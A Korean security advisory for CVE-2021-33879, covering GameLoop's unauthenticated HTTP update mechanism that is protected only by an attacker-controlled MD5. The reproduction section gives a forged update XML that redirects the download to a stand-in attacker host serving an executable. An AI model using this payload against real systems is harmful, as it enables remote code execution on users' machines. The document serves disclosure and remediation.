
GameLoop 업데이트 MITM
CVEID: CVE-2021-33879
영향을 받는 제품 및 버전: GameLoop (4.1.21.90 이전의 모든 버전)
취약점 유형: CWE-494: 무결성 검사 없는 코드 다운로드
요약
GameLoop는 Tencent가 개발한 Android 에뮬레이터입니다. 이 에뮬레이터에는 암호화되거나 인증되지 않은 업데이트 메커니즘이 있습니다(이 공격에서 공격자가 제어할 수 있는 MD5 해시로만 보호됨). 따라서 MITM 위치에 있는 공격자가 업데이트 패키지를 가로채고 자신의 업데이트 패키지를 보내 피해자 머신에서 실행되게 할 수 있습니다.
설명
4.1.21.90 이전의 Tencent GameLoop는 안전하지 않은 HTTP 연결을 통해 업데이트를 다운로드했습니다. MITM 위치에 있는 악의적인 공격자는 업데이트 패키지를 설명하는 XML 문서의 내용을 위조하여 다운로드 URL을 임의의 Windows 실행 파일을 가리키는 URL로 교체할 수 있습니다. 유일한 무결성 검사는 다운로드한 파일의 MD5 체크섬을 XML 문서에 포함된 체크섬과 비교하는 것이기 때문에, 다운로드된 실행 파일은 피해자 머신에서 실행됩니다.
재현
<?xml version="1.0" encoding="utf-8"?>
<UpdateConfig>
<GlobalConfig>
<Item name="UpdateEnable" Value="1" />
</GlobalConfig>
<UpdatePolicy>
<PolicyItem id="1" Enable="1" AutoUpdateRate="1" ManualUpdateRate="100" MatchUpdateOperation="2" Weight="4">
<Condition Method="Or">
<MatchSupplyId Type="market" MatchResult="0" Start="3.10.199.100" End="4.99.999.999" />
</Condition>
</PolicyItem>
</UpdatePolicy>
<UpdateOperation>
<OperItem id="2" inherit="0" Desc="This is a malicious update" Title="Malicious update" text="I could serve you ransomware but I'll just spawn calc">
<Item Type="market" url="http://attacker.local/calc.exe" md5="c4cb4fdf6369dd1342d2666171866ce5" version="5.10.199.100" filesize="32768" />
</OperItem>
</UpdateOperation>
</UpdateConfig>


해결 방법
최신 버전의 GameLoop를 설치하십시오.